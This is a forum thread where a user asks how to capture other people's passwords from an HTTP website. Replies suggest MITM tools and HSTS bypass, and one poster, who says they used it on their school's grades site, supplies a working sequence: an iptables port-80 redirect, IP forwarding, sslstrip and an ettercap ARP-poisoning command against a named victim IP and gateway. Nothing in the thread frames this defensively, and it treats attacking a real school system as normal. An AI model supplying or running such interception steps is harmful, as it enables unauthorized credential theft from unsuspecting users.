Is there any way to get or sniff password from a HTTP website? Plz i have watched many YouTube videos about capturing passwords using Wireshark but in these cases we need to know the exact login password. Here i do not know the password. Kindly help if you know.
Hii root sec
According to me u can use mitmf or bettercap or xerosploit
Or u can bypass hsts and then use wireshark for the passwd dumping this will defenately work🙃
I tried this on the web-site of my school (small http interface to view grades, schedules… not very secure ) and it worked .
-Modify iptables rules:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port (listening port)
-activate port forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
ssltrip -l (listening-port)
-use ettercap (victim) (access point)
ettercap -Tq -M arp:remote -i wlan0 -S /192.168.1.115// /192.168.1.1//
did you see in the POST segment ?
i used this in my last semester lab.
Any more details or briefing available ?
isn’t xerxes for ddos attack?
@Rootsec It is pretty straight forward .
This is the result:
What other details do you need?
Yes my bad bro i want to say xerosploit
My mistake bro